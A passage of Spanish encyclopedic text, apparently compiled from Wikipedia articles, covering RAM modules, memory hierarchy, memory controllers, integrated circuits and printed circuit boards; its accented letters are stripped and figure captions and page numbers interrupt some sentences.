Los mdulos de memoria RAM son tarjetas de circuito impreso que tienen soldados integrados de memoria DRAM por una o ambas caras. La implementacin DRAM se basa en una topologa de Circuito elctrico que permite alcanzar densidades altas de memoria por cantidad de transistores, logrando integrados de cientos o miles de megabits. Adems de DRAM, los mdulos poseen un integrado que permiten la identificacin de los mismos ante el computador por medio del protocolo de comunicacin SPD. La conexin con los dems componentes se realiza por medio de un rea de pines en uno de los filos del circuito impreso, que permiten que el modulo al ser instalado en un zcalo apropiado de Formato SO-DIMM. la placa base, tenga buen contacto elctrico con los controladores de memoria y las fuentes de alimentacin. Los primeros mdulos comerciales de memoria eran SIPP de formato propietario, es decir no haba un estndar entre distintas marcas. Otros mdulos propietarios bastante conocidos fueron los RIMM, ideados por la empresa RAMBUS. La necesidad de hacer intercambiable los mdulos y de utilizar integrados de distintos fabricantes condujo al establecimiento de estndares de la industria como los JEDEC. Mdulos SIMM: Formato usado en computadores antiguos. Tenan un bus de datos de 16 32 bits Mdulos DIMM: Usado en computadores de escritorio. Se caracterizan por tener un bus de datos de 64 bits. Mdulos SO-DIMM: Usado en computadores porttiles. Formato miniaturizado de DIMM.

Relacin con el resto del sistema


Dentro de la jerarqua de memoria la RAM se encuentra en un nivel despus de los registros del procesador y de las cachs en cuanto a velocidad. Los mdulos de memoria se conectan elctricamente a un controlador de memoria que gestiona las seales entrantes y salientes de los integrados DRAM. Las seales son de tres tipos: direccionamiento, datos y seales de control. En el mdulo de memoria esas seales estn divididas en dos buses y un conjunto miscelneo de lneas de control y alimentacin, Entre todas forman el bus de memoria que conecta la RAM con su controlador: Bus de datos: Son las lneas que llevan informacin entre los integrados y el controlador. Por lo general estn agrupados en octetos siendo de 8,16,32 y 64 bits, Diagrama de la cantidad que debe igualar el ancho del bus de datos del procesador. En el pasado, arquitectura de un algunos formatos de modulo, no tenan un ancho de bus igual al del procesador.En ese ordenador. caso haba que montar mdulos en pares o en situaciones extremas, de a 4 mdulos, para completar lo que se denominaba banco de memoria, de otro modo el sistema no funciona. Esa fue la principal razn para aumentar el nmero de pines en los mdulos, igualando al ancho de bus de procesadores como el Pentium a 64 bits, a principios de los 90. Bus de direcciones: Es un bus en el cual se colocan las direcciones de memoria a las que se requiere acceder. No es igual al bus de direcciones del resto del sistema, ya que est multiplexado de manera que la direccin se enva en dos etapas.Para ello el controlador realiza temporizaciones y usa las lneas de control. En cada estndar de mdulo se establece un tamao mximo en bits de este bus, estableciendo un lmite terico de la capacidad mxima por mdulo.

Memoria de acceso aleatorio Seales miscelneas: Entre las que estn las de la alimentacin (Vdd, Vss) que se encargan de entregar potencia a los integrados. Estn las lneas de comunicacin para el integrado de presencia que sirve para identificar cada mdulo. Estn las lneas de control entre las que se encuentran las llamadas RAS (row address strobe) y CAS (column address strobe) que controlan el bus de direcciones, por ltimo estn las seales de reloj en las memorias sincrnicas SDRAM. Algunos controladores de memoria en sistemas como PC y servidores se encuentran embebidos en el llamado "North Bridge" o "Puente Norte" de la placa base. Otros sistemas incluyen el controlador dentro del mismo procesador (en el caso de los procesadores desde AMD Athlon 64 e Intel Core i7 y posteriores). En la mayora de los casos el tipo de memoria que puede manejar el sistema est limitado por los sockets para RAM instalados en la placa base, a pesar que los controladores de memoria en muchos casos son capaces de conectarse con tecnologas de memoria distintas. Una caracterstica especial de algunos controladores de memoria, es el manejo de la tecnologa canal doble (Dual Channel), donde el controlador maneja bancos de memoria de 128 bits, siendo capaz de entregar los datos de manera intercalada, optando por uno u otro canal, reduciendo las latencias vistas por el procesador. La mejora en el desempeo es variable y depende de la configuracin y uso del equipo. Esta caracterstica ha promovido la modificacin de los controladores de memoria, resultando en la aparicin de nuevos chipsets (la serie 865 y 875 de Intel) o de nuevos zcalos de procesador en los AMD (el 939 con canal doble , reemplazo el 754 de canal sencillo). Los equipos de gama media y alta por lo general se fabrican basados en chipsets o zcalos que soportan doble canal o superior, como en el caso del zcalo (o socket, en ingls) 1366 de Intel, que usaba un triple canal de memoria, o su nuevo LGA 2011 que usa cudruple canal.

124

Deteccin y correccin de errores


Existen dos clases de errores en los sistemas de memoria, las fallas (Hard fails) que son daos en el hardware y los errores (soft errors) provocados por causas fortuitas. Los primeros son relativamente fciles de detectar (en algunas condiciones el diagnstico es equivocado), los segundos al ser resultado de eventos aleatorios, son ms difciles de hallar. En la actualidad la confiabilidad de las memorias RAM frente a los errores, es suficientemente alta como para no realizar verificacin sobre los datos almacenados, por lo menos para aplicaciones de oficina y caseras. En los usos ms crticos, se aplican tcnicas de correccin y deteccin de errores basadas en diferentes estrategias: La tcnica del bit de paridad consiste en guardar un bit adicional por cada byte de datos y en la lectura se comprueba si el nmero de unos es par (paridad par) o impar (paridad impar), detectndose as el error. Una tcnica mejor es la que usa ECC, que permite detectar errores de 1 a 4 bits y corregir errores que afecten a un slo bit. Esta tcnica se usa slo en sistemas que requieren alta fiabilidad. Por lo general los sistemas con cualquier tipo de proteccin contra errores tiene un costo ms alto, y sufren de pequeas penalizaciones en desempeo, con respecto a los sistemas sin proteccin. Para tener un sistema con ECC o paridad, el chipset y las memorias deben tener soporte para esas tecnologas. La mayora de placas base no poseen dicho soporte. Para los fallos de memoria se pueden utilizar herramientas de software especializadas que realizan pruebas sobre los mdulos de memoria RAM. Entre estos programas uno de los ms conocidos es la aplicacin Memtest86+ que detecta fallos de memoria.

Memoria RAM registrada


Es un tipo de mdulo usado frecuentemente en servidores, posee circuitos integrados que se encargan de repetir las seales de control y direcciones: las seales de reloj son reconstruidas con ayuda del PLL que est ubicado en el mdulo mismo. Las seales de datos se conectan de la misma forma que en los mdulos no registrados: de manera directa entre los integrados de memoria y el controlador. Los sistemas con memoria registrada permiten conectar ms mdulos de memoria y de una capacidad ms alta, sin que haya perturbaciones en las seales del controlador de

Memoria de acceso aleatorio memoria, permitiendo el manejo de grandes cantidades de memoria RAM. Entre las desventajas de los sistemas de memoria registrada estn el hecho de que se agrega un ciclo de retardo para cada solicitud de acceso a una posicin no consecutiva y un precio ms alto que los mdulos no registrados. La memoria registrada es incompatible con los controladores de memoria que no soportan el modo registrado, a pesar de que se pueden instalar fsicamente en el zcalo. Se pueden reconocer visualmente porque tienen un integrado mediano, cerca del centro geomtrico del circuito impreso, adems de que estos mdulos suelen ser algo ms altos.[4] Durante el ao 2006 varias marcas lanzaron al mercado sistemas con memoria FB-DIMM que en su momento se pensaron como los sucesores de la memoria registrada, pero se abandon esa tecnologa en 2007 dado que ofreca pocas ventajas sobre el diseo tradicional de memoria registrada y los nuevos modelos con memoria DDR3.[5]

125

Referencias
[4] http:/ / download. micron. com/ pdf/ datasheets/ modules/ ddr2/ HTJ_S36C512_1Gx72. pdf [5] http:/ / www. theinquirer. net/ inquirer/ news/ 1014319/ fb-dimm-dead-rddr3-king

Jerarqua de memoria
Se conoce como jerarqua de memoria a la organizacin piramidal de la memoria en niveles que tienen los ordenadores. Su objetivo es conseguir el rendimiento de una memoria de gran velocidad al coste de una memoria de baja velocidad, basndose en el principio de cercana de referencias. Los puntos bsicos relacionados con la memoria pueden resumirse en: Cantidad Velocidad Coste La cuestin de la cantidad es simple, Diagrama de la jerarqua de memoria. cuanto ms memoria haya disponible, ms podr utilizarse. La velocidad ptima para la memoria es la velocidad a la que el procesador puede trabajar, de modo que no haya tiempos de espera entre clculo y clculo, utilizados para traer operandos o guardar resultados. En suma, el coste de la memoria no debe ser excesivo, para que sea factible construir un equipo accesible. Como puede esperarse los tres factores compiten entre s, por lo que hay que encontrar un equilibrio. Las siguientes afirmaciones son vlidas: A menor tiempo de acceso mayor coste. A mayor capacidad menor coste por bit. A mayor capacidad menor velocidad. Se busca entonces contar con capacidad suficiente de memoria, con una velocidad que sirva para satisfacer la demanda de rendimiento y con un coste que no sea excesivo. Gracias a un principio llamado cercana de referencias, es factible utilizar una mezcla de los distintos tipos y lograr un rendimiento cercano al de la memoria ms rpida. Los niveles que componen la jerarqua de memoria habitualmente son:

Jerarqua de memoria Nivel 0: Registros Nivel 1: Memoria cach Nivel 2: Memoria principal Nivel 3: Memorias flash Nivel 4: Disco duro (con el mecanismo de memoria virtual) Nivel 5: Cintas magnticas Consideradas las ms lentas, con mayor capacidad. Nivel 6: Redes (Actualmente se considera un nivel ms de la jerarqua de memorias)

126

Gestin de memoria
Los lenguajes de programacin actuales generalmente asumen la existencia de nicamente dos niveles de memoria, memoria principal y almacenamiento secundario (normalmente en disco). Aunque en lenguaje ensamblador, ensamblador en lnea y lenguajes como C y C++ podemos direccionar datos directamente a los registros del procesador. Para aprovechar de forma ptima las ventajas de la jerarqua de memoria es necesario cooperacin entre programadores, compiladores y fabricantes de hardware: Programadores deben ser responsables del movimiento entre memoria principal y disco mediante el uso de ficheros. Hardware el movimiento de datos entre la memoria principal y los niveles de cach es realizado por algoritmos hardware. Compiladores son responsables de optimizar el cdigo de modo que el uso de los registros y la cach sea eficiente.

Controlador de memoria
El controlador de memoria es un circuito electrnico digital que se encarga de gestionar el flujo de datos entre el procesador y la memoria. Puede ser independiente o integrado en otro chip como en el encapsulado del procesador. Tradicionalmente Intel ha colocado el controlador de memoria independiente, localizado en el northbridge de la placa base, aunque muchos modelos como DEC/Compaq, Alpha 21364, AMD Athlon 64, AMD Opteron, IBM POWER5, Sun Microsystems UltraSPARC T1, y ms recientemente algunos modelos de Intel Nehalem integran el controlador de memoria dentro de la misma cmara del procesador; sin embargo la tendencia es integrarlo en el mismo encapsulado del procesador. Todo ello con el objetivo de reducir la latencia y el consumo. Sin embargo este mtodo de integracin lastra a renovar los controladores segn avanza la tecnologa de las memorias. Realmente, el concepto de integracin no es una idea nueva, varios modelos de procesadores de la dcada de 1990, como los DEC Alpha 21066 y HP PA-7300LC ya integraban el controlador de memoria dentro de su procesador, aunque no con el propsito de ganancia de rendimiento, sino ms bien para ahorrar costes eliminando la necesidad de un chip externo.

Controlador de memoria

127

Propsito
Los controladores de memoria contienen los elementos necesarios para leer y escribir en la DRAM y actualizar la memoria RAM mediante envo de impulsos de corriente a travs de todo el dispositivo. Si no se actualizase, la DRAM perdera los datos escritos en los condensadores al dejar escapar la carga en menos de una fraccin de segundo. Segn las normas de JEDEC, dichas cargas no se escapan con menos de 64 milisegundos La lectura y escritura en la DRAM se realiza mediante unas direcciones fsicas de columnas y filas a travs de un circuito multiplexor, donde posteriormente un demultiplexor se encarga de seleccionar la celda a la que se desee acceder, al enviar los datos desde la DRAM necesita volver a pasar por el multiplexor con el fin de reducir el ancho de bus de la operacin. El ancho de bus se define como el nmero de lneas paralelas dispuestas para poder comunicarse con las celdas. Este ancho se construye de 8 bits hasta de 512 bits, presentes tpicamente en ordenadores que requieren una ingente cantidad de transferencia de datos, o ms comnmente en las tarjetas grficas. En stas ltimas se suelen agrupar en varios chips de 64 bits que trabajan conjuntamente para lograr una suma mayor.

Controladores DDR
DDR son las siglas del ingls Double Data Rate, en espaol podramos denominarlas Memoria de doble tasa de transferencia de datos. Los controladores de memoria DDR son capaces de manejar memorias del tipo DDR SDRAM, que son capaces de doblar la tasa de datos transferidos a igual frencuencia de reloj y ancho de bus que sus predecesoras.

Circuito integrado
Un circuito integrado (CI), tambin conocido como chip o microchip, es una pastilla pequea de material semiconductor, de algunos milmetros cuadrados de rea, sobre la que se fabrican circuitos electrnicos generalmente mediante fotolitografa y que est protegida dentro de un encapsulado de plstico o cermica. El encapsulado posee conductores metlicos apropiados para hacer conexin entre la pastilla y un circuito impreso.

Circuitos integrados de memoria con una ventana de cristal de cuarzo que posibilita su borrado mediante radiacin ultravioleta.

Circuito integrado

128

Introduccin
En abril de 1949, el ingeniero alemn Werner Jacobi[] (Siemens AG) completa la primera solicitud de patente para circuitos integrados con dispositivos amplificadores de semiconductores. Jacobi realiz una tpica aplicacin industrial para su patente, la cual no fue registrada. Ms tarde, la integracin de circuitos fue conceptualizada por el cientfico de radares Geoffrey W.A. Dummer (1909-2002), que estaba trabajando para la Royal Radar Establishment del Ministerio de Defensa Britnico, a finales de la dcada de 1940 y principios de la dcada de 1950. El primer circuito integrado fue desarrollado en 1959 por el ingeniero Jack Kilby[] (1923-2005) pocos meses despus de haber sido contratado por la firma Texas Instruments. Se trataba de un dispositivo de germanio que integraba seis transistores en una misma base semiconductora para formar un oscilador de rotacin de fase. En el ao 2000 Kilby fue galardonado con el Premio Nobel de Fsica por la enorme contribucin de su invento al desarrollo de la tecnologa.[1]

Geoffrey Dummer en los aos 1950.

Al mismo tiempo que Jack Kilby, pero de forma independiente, Robert Noyce desarroll su propio circuito integrado, que patent unos seis meses despus. Adems resolvi algunos problemas prcticos que posea el circuito de Kilby, como el de la interconexin de todos los componentes; al simplificar la esctructura del chip mediante la adicin del metal en una capa final y la eliminacin de algunas de las conexiones, el circuito integrado se hizo ms adecuado para la produccin en masa. Adems de ser uno de los pioneros del circuito integrado, Robert Noyce tambin fue uno de los co-fundadores de Intel, uno de los mayores fabricantes de circuitos integrados del mundo.[2] Los circuitos integrados se encuentran en todos los aparatos electrnicos modernos, como relojes de pulsera, automviles, televisores, reproductores de CD, reproductores de MP3, telfonos mviles, computadoras, equipos mdicos, etc. El desarrollo de los circuitos integrados fue posible gracias a descubrimientos experimentales que demostraron que los semiconductores pueden realizar algunas de las funciones de las vlvulas de vaco. La integracin de grandes cantidades de diminutos transistores en pequeos chips fue un enorme avance sobre el ensamblaje manual de los tubos de vaco (vlvulas) y en la fabricacin de circuitos electrnicos utilizando componentes discretos. La capacidad de produccin masiva de circuitos integrados, su confiabilidad y la facilidad de agregarles complejidad, llev a su estandarizacin, reemplazando diseos que utilizaban transistores discretos, y que pronto dejaron obsoletas a las vlvulas o tubos de vaco. Son tres las ventajas ms importantes que tienen los circuitos integrados sobre los circuitos electrnicos construidos con componentes discretos: su menor costo; su mayor eficiencia energtica y su reducido tamao. El bajo costo es debido a que los CI son fabricados siendo impresos como una sola pieza por fotolitografa a partir de una oblea, generalmente de silicio, permitiendo la produccin en cadena de grandes cantidades, con una muy baja tasa de defectos. La elevada eficiencia se debe a que, dada la miniaturizacin de todos sus componentes, el consumo de energa es considerablemente menor, a iguales condiciones de funcionamiento que un homlogo fabricado con componentes discretos. Finalmente, el ms notable atributo, es su reducido tamao en relacin a los circuitos discretos; para ilustrar esto: un circuito integrado puede contener desde miles hasta varios millones de transistores en

Circuito integrado unos pocos milmetros cuadrados.

129

Avances en los circuitos integrados


Los avances que hicieron posible el circuito integrado han sido, fundamentalmente, los desarrollos en la fabricacin de dispositivos semiconductores a mediados del siglo XX y los descubrimientos experimentales que mostraron que estos dispositivos podan reemplazar las funciones de las vlvulas o tubos de vaco, que se volvieron rpidamente obsoletos al no poder competir con el pequeo tamao, el consumo de energa moderado, los tiempos de conmutacin mnimos, la confiabilidad, la capacidad de produccin en masa y la versatilidad de los CI.[3] Entre los circuitos integrados ms complejos y avanzados se encuentran los microprocesadores, que controlan numerosos aparatos, desde telfonos mviles y hornos microondas hasta computadoras . Los chips de memorias digitales son otra familia de circuitos integrados, de importancia crucial para la moderna sociedad de la informacin. Mientras que el costo de disear y desarrollar un circuito integrado complejo es bastante alto, cuando se reparte entre millones de unidades de produccin, el costo individual de los CIs por lo general se reduce al mnimo. La eficiencia de los CI es alta debido a que el pequeo tamao de los chips permite cortas conexiones que posibilitan la utilizacin de lgica de bajo consumo (como es el caso de CMOS), y con altas velocidades de conmutacin. A medida que transcurren los aos, los circuitos integrados van evolucionando: se fabrican en tamaos cada vez ms pequeos, con mejores caractersticas y prestaciones, mejoran su eficiencia y su eficacia, y se permite as que mayor cantidad de elementos sean empaquetados (integrados) en un mismo chip (vase la ley de Moore). Al tiempo que el tamao se reduce, otras cualidades tambin mejoran (el costo y el consumo de energa disminuyen, y a la vez que aumenta el rendimiento). Aunque estas ganancias son aparentemente para el usuario final, existe una feroz competencia entre los fabricantes para utilizar geometras cada vez ms delgadas. Este proceso, y lo esperado para los prximos aos, est muy bien descrito por la International Technology Roadmap for Semiconductors. [4]

Popularidad
Solo ha trascurrido medio siglo desde que se inici su desarrollo y los circuitos integrados se han vuelto casi omnipresentes. Computadoras, telfonos mviles y otras aplicaciones digitales son ahora partes de las sociedades modernas. La informtica, las comunicaciones, la manufactura y los sistemas de transporte, incluyendo Internet, todos dependen de la existencia de los circuitos integrados. De hecho, muchos estudiosos piensan que la revolucin digital causada por los circuitos integrados es uno de los sucesos ms significativos de la historia de la humanidad.[5]

Tipos
Existen al menos tres tipos de circuitos integrados: Circuitos monolticos: Estn fabricados en un solo monocristal, habitualmente de silicio, pero tambin existen en germanio, arseniuro de galio, silicio-germanio, etc. Circuitos hbridos de capa fina: Son muy similares a los circuitos monolticos, pero, adems, contienen componentes difciles de fabricar con tecnologa monoltica. Muchos conversores A/D y conversores D/A se fabricaron en tecnologa hbrida hasta que los progresos en la tecnologa permitieron fabricar resistores precisos. Circuitos hbridos de capa gruesa: Se apartan bastante de los circuitos monolticos. De hecho suelen contener circuitos monolticos sin cpsula, transistores, diodos, etc, sobre un sustrato dielctrico, interconectados con pistas conductoras. Los resistores se depositan por serigrafa y se ajustan hacindoles cortes con lser. Todo ello se encapsula, en cpsulas plsticas o metlicas, dependiendo de la disipacin de energa calrica requerida. En muchos casos, la cpsula no est "moldeada", sino que simplemente se cubre el circuito con una resina epoxi para protegerlo. En el mercado se encuentran circuitos hbridos para aplicaciones en mdulos de radio frecuencia (RF), fuentes de alimentacin, circuitos de encendido para automvil, etc.

Circuito integrado

130

Clasificacin
Atendiendo al nivel de integracin -nmero de componentes- los circuitos integrados se pueden clasificar en: SSI (Small Scale Integration) pequeo nivel: de 10 a 100 transistores MSI (Medium Scale Integration) medio: 101 a 1.000 transistores LSI (Large Scale Integration) grande: 1.001 a 10.000 transistores VLSI (Very Large Scale Integration) muy grande: 10.001 a 100.000 transistores ULSI (Ultra Large Scale Integration) ultra grande: 100.001 a 1.000.000 transistores GLSI (Giga Large Scale Integration) giga grande: ms de un milln de transistores

En cuanto a las funciones integradas, los circuitos se clasifican en dos grandes grupos: Circuitos integrados analgicos. Pueden constar desde simples transistores encapsulados juntos, sin unin entre ellos, hasta circuitos completos y funcionales, como amplificadores, osciladores o incluso receptores de radio completos. Circuitos integrados digitales. Pueden ser desde bsicas puertas lgicas (AND, OR, NOT) hasta los ms complicados microprocesadores o microcontroladores. Algunos son diseados y fabricados para cumplir una funcin especfica dentro de un sistema mayor y ms complejo. En general, la fabricacin de los CI es compleja ya que tienen una alta integracin de componentes en un espacio muy reducido, de forma que llegan a ser microscpicos. Sin embargo, permiten grandes simplificaciones con respecto a los antiguos circuitos, adems de un montaje ms eficaz y rpido.

Limitaciones de los circuitos integrados


Existen ciertos lmites fsicos y econmicos al desarrollo de los circuitos integrados. Bsicamente, son barreras que se van alejando al mejorar la tecnologa, pero no desaparecen. Las principales son:

Disipacin de potencia
Los circuitos elctricos disipan potencia. Cuando el nmero de componentes integrados en un volumen dado crece, las exigencias en cuanto a disipacin de esta potencia, tambin crecen, calentando el sustrato y degradando el comportamiento del dispositivo. Adems, en muchos casos es un sistema de realimentacin positiva, de modo que cuanto mayor sea la temperatura, ms corriente conducen, fenmeno que se suele llamar "embalamiento trmico" y, que si no se evita, llega a destruir el dispositivo. Los amplificadores de audio y los reguladores de tensin son proclives a este fenmeno, por lo que suelen incorporar protecciones trmicas. Los circuitos de potencia, evidentemente, son los que ms energa deben disipar. Para ello su cpsula contiene partes metlicas, en contacto con la parte inferior del chip, que sirven de conducto trmico para transferir el calor del chip al disipador o al ambiente. La reduccin de resistividad trmica de este conducto, as como de las nuevas cpsulas de compuestos de silicona, permiten mayores disipaciones con cpsulas ms pequeas. Los circuitos digitales resuelven el problema reduciendo la tensin de alimentacin y utilizando tecnologas de bajo consumo, como CMOS. Aun as en los circuitos con ms densidad de integracin y elevadas velocidades, la disipacin es uno de los mayores problemas, llegndose a utilizar experimentalmente ciertos tipos de criostatos. Precisamente la alta resistividad trmica del arseniuro de galio es su taln de Aquiles para realizar circuitos digitales con l.

Circuito integrado

131

Capacidades y autoinducciones parsitas


Este efecto se refiere principalmente a las conexiones elctricas entre el chip, la cpsula y el circuito donde va montada, limitando su frecuencia de funcionamiento. Con pastillas ms pequeas se reduce la capacidad y la autoinduccin de ellas. En los circuitos digitales excitadores de buses, generadores de reloj, etc, es importante mantener la impedancia de las lneas y, todava ms, en los circuitos de radio y de microondas.

Lmites en los componentes


Los componentes disponibles para integrar tienen ciertas limitaciones, que difieren de sus contrapartidas discretas. Resistores. Son indeseables por necesitar una gran cantidad de superficie. Por ello slo se usan valores reducidos y en tecnologas MOS se eliminan casi totalmente. Condensadores. Slo son posibles valores muy reducidos y a costa de mucha superficie. Como ejemplo, en el amplificador operacional A741, el condensador de estabilizacin viene a ocupar un cuarto del chip. Inductores. Se usan comnmente en circuitos de radiofrecuencia, siendo hbridos muchas veces. En general no se integran.

Densidad de integracin
Durante el proceso de fabricacin de los circuitos integrados se van acumulando los defectos, de modo que cierto nmero de componentes del circuito final no funcionan correctamente. Cuando el chip integra un nmero mayor de componentes, estos componentes defectuosos disminuyen la proporcin de chips funcionales. Es por ello que en circuitos de memorias, por ejemplo, donde existen millones de transistores, se fabrican ms de los necesarios, de manera que se puede variar la interconexin final para obtener la organizacin especificada.

Referencias
[2] Historia del circuito integrado en la pgina oficial de los Premios Nobel (http:/ / www. nobelprize. org/ educational/ physics/ integrated_circuit/ history/ index. html)

Enlaces externos
Documentacin sobre Jack Kilby y su descubrimiento en el sitio web de la empresa [[Texas Instruments (http:// www.ti.com/corp/docs/kilbyctr/jackstclair.shtml)]] Wikimedia Commons alberga contenido multimedia sobre Circuito integrado. Commons

Circuito impreso

132

Circuito impreso
En electrnica, un circuito impreso, tarjeta de circuito impreso o PCB (del ingls printed circuit board), es una superficie constituida por caminos o pistas de material conductor laminadas sobre una base no conductora. El circuito impreso se utiliza para conectar elctricamente - a travs de los caminos conductores, y sostener mecnicamente - por medio de la base, un conjunto de componentes electrnicos. Los caminos son generalmente de cobre mientras que la base se fabrica de resinas de fibra de vidrio reforzada (la ms conocida es la FR4), cermica, plstico, tefln o polmeros como la baquelita.

Parte de una tarjeta madre de computador de 1983 Sinclair ZX Spectrum. Se ven las lneas conductoras, los caminos y algunos componentes montados.

La produccin de los PCB y el montaje de los componentes puede ser automatizada.[1] Esto permite que en ambientes de produccin en masa, sean ms econmicos y confiables que otras alternativas de montaje- por ejemplo el punto a punto. En otros contextos, como la construccin de prototipos basada en ensamble manual, la escasa capacidad de modificacin una vez construidos y el esfuerzo que implica la soldadura de los componentes[2] hace que los PCB no sean una alternativa ptima. La Organizacin IPC (Institute for Printed Circuits), ha generado un conjunto de estndares que regulan el diseo, ensamblado y control de calidad de los circuitos impresos, siendo la familia IPC-2220 una de las de mayor reconocimiento en la industria. Otras organizaciones tales como American National Standards Institute (ANSI), International Engineering Consortium (IEC), Electronic Industries Alliance (EIA), Joint Electron Device Engineering Council (JEDEC) tambin contribuyen con estndares relacionados.

Historia
El inventor del circuito impreso fue probablemente el ingeniero austriaco Paul Eisler (1907-1995) quien, mientras trabajaba en Inglaterra, fabric uno alrededor de 1936, como parte de una radio. [citarequerida] Alrededor de 1943, los Estados Unidos comenzaron a usar esta tecnologa en gran escala para fabricar radios que fuesen robustas, para ser usadas en la Segunda Guerra Mundial. Despus de la guerra, en 1948, EE.UU. liber la invencin para el uso comercial. [citarequerida] Los circuitos impresos no se volvieron populares en la electrnica de consumo hasta mediados de 1950, cuando el proceso de Auto-Ensamblaje fue desarrollado por la Armada de los Estados Unidos.
[citarequerida]

Antes que los circuitos impresos (y por un tiempo despus de su invencin), la conexin punto a punto era la ms usada. Para prototipos, o produccin de pequeas cantidades, el mtodo 'wire wrap' puede considerarse ms eficiente. [citarequerida] Originalmente, cada componente electrnico tena pines de cobre o latn de varios milmetros de longitud, y el circuito impreso tena orificios taladrados para cada pin del componente. Los pines de los componentes atravesaban los orificios y eran soldados a las pistas del circuito impreso. Este mtodo de ensamblaje es llamado through-hole ( "a travs del orificio", por su nombre en ingls). [citarequerida] En 1949, Moe Abramson y Stanilus F. Danko, de la United States Army Signal Corps desarrollaron el proceso de autoensamblaje, en donde las pines de los componentes eran insertadas en una lmina de cobre con el patrn de interconexin, y luego eran soldadas. [citarequerida] Con el desarrollo de la laminacin de tarjetas y tcnicas de grabados, este concepto evolucion en el proceso estndar de fabricacin de circuitos impresos usado en la actualidad. La soldadura se puede hacer automticamente pasando la tarjeta sobre un flujo de soldadura derretida, en una mquina de soldadura por ola. [citarequerida]

Circuito impreso El costo asociado con la perforacin de los orificios y el largo adicional de las pines se elimina al utilizar dispositivo de montaje superficial. Vea Tecnologa de montaje superficial ms abajo.

133

Composicin fsica
La mayora de los circuitos impresos estn compuestos por entre una a diecisis capas conductoras, separadas y soportadas por capas de material aislante (sustrato) laminadas (pegadas) entre s. Las capas pueden conectarse a travs de orificios, llamados vas. Los orificios pueden ser electorecubiertos, o se pueden utilizar pequeos remaches. Los circuitos impresos de alta densidad pueden tener vas ciegas, que son visibles en slo un lado de la tarjeta, o vas enterradas, que no son visibles en el exterior de la tarjeta.

Sustratos
Los sustratos de los circuitos impresos utilizados en la electrnica de consumo de bajo costo, se hacen de papel impregnado de resina fenlica, a menudo llamados por su nombre comercial Prtinax. Usan designaciones como XXXP, XXXPC y FR-2. El material es de bajo costo, fcil de mecanizar y causa menos desgaste de las herramientas que los sustratos de fibra de vidrio reforzados. Las letras "FR" en la designacin del material indican "retardante de llama" (Flame Retardant en ingls). Los sustratos para los circuitos impresos utilizados en la electrnica industrial y de consumo de alto costo, estn hechos tpicamente de un material designado FR-4. stos consisten en un material de fibra de vidrio, impregnados con una resina epxica resistente a las llamas. Pueden ser mecanizados, pero debido al contenido de vidrio abrasivo, requiere de herramientas hechas de carburo de tungsteno en la produccin de altos volmenes. Debido al reforzamiento de la fibra de vidrio, exhibe una resistencia a la flexin alrededor de 5 veces ms alta que el Pertinax, aunque a un costo ms alto. Los sustratos para los circuitos impresos de circuitos de radio en frecuencia de alta potencia usan plsticos con una constante dielctrica (permitividad) baja, tales como Rogers 4000, Rogers Duroid, DuPont Tefln (tipos GT y GX), poliamida, poliestireno y poliestireno entrecruzado. Tpicamente tienen propiedades mecnicas ms pobres, pero se considera que es un compromiso de ingeniera aceptable, en vista de su desempeo elctrico superior. Los circuitos impresos utilizados en el vaco o en gravedad cero, como en una nave espacial, al ser incapaces de contar con el enfriamiento por conveccin, a menudo tienen un ncleo grueso de cobre o aluminio para disipar el calor de los componentes electrnicos. No todas las tarjetas usan materiales rgidos. Algunas son diseadas para ser muy o ligeramente flexibles, usando DuPont's Kapton film de poliamida y otros. Esta clase de tarjetas, a veces llamadas circuitos flexibles, o circuitos rgido-flexibles, respectivamente, son difciles de crear, pero tienen muchas aplicaciones. A veces son flexibles para ahorrar espacio (los circuitos impresos dentro de las cmaras y audfonos son casi siempre circuitos flexibles, de tal forma que puedan doblarse en el espacio disponible limitado. En ocasiones, la parte flexible del circuito impreso se utiliza como cable o conexin mvil hacia otra tarjeta o dispositivo. Un ejemplo de esta ltima aplicacin es el cable que conecta el cabezal en una impresora de inyeccin de tinta.

Circuito impreso

134

Caractersticas bsicas del sustrato


Mecnicas
1. Suficientemente rgidos para mantener los componentes. 2. Fcil de taladrar. 3. Sin problemas de laminado.

Qumicas
1. Metalizado de los taladros. 2. Retardante de las llamas. 3. No absorbe demasiada humedad.

Trmicas
1. Disipa bien el calor. 2. Coeficiente de expansin trmica bajo para que no se rompa. 3. Capaz de soportar el calor en la soldadura. 4. Capaz de soportar diferentes ciclos de temperatura.

Elctricas
1. Constante dielctrica baja para tener pocas prdidas. 2. Punto de ruptura dielctrica alto.

Diseo
Usualmente un ingeniero elctrico o electrnico disea el circuito y un especialista disea el circuito impreso. El diseador debe obedecer numerosas normas para disear un circuito impreso que funcione correctamente y que al mismo tiempo sea barato de fabricar.

Diseo electrnico automatizado


Los diseadores de circuitos impresos a menudo utilizan programas de diseo electrnico automatizado (EDA por sus siglas en ingls), para distribuir e interconectar los componentes. Estos programas almacenan informacin relacionada con el diseo, facilita la edicin, y puede tambin automatizar tareas repetitivas. La primera etapa es convertir el esquema en una lista de nodos (o net list en ingls). La lista de nodos es una lista de los pines (o patillas) y nodos del circuito, a los que se conectan los pines de los componentes. Usualmente el programa de captura de esquemticos, utilizado por el diseador del circuito, es responsable de la generacin de la lista de nodos, y esta lista es posteriormente importada en el programa de ruteo. El siguiente paso es determinar la posicin de cada componente. La forma sencilla de hacer esto es especificar una rejilla de filas y columnas, donde los dispositivos deberan ir. Luego, el programa asigna el pin 1 de cada dispositivo en la lista de componentes, a una posicin en la rejilla. Tpicamente, el operador puede asistir a la rutina de posicionamiento automtico al especificar ciertas zonas de la tarjeta, donde deben ir determinados grupos de componentes. Por ejemplo, a las partes asociadas con el subcircuito de la fuente de alimentacin se les podra asignar una zona cercana a la entrada al conector de alimentacin. En otros casos, los componentes pueden ser posicionados manualmente, ya sea para optimizar el desempeo del circuito, o para poner componentes tales como perillas, interruptores y conectores, segn lo requiere el diseo mecnico del sistema. El computador luego expande la lista de componentes en una lista completa de todos los pines para la tarjeta, utilizando plantillas de una biblioteca de footprints asociados a cada tipo de componentes. Cada footprint es un mapa

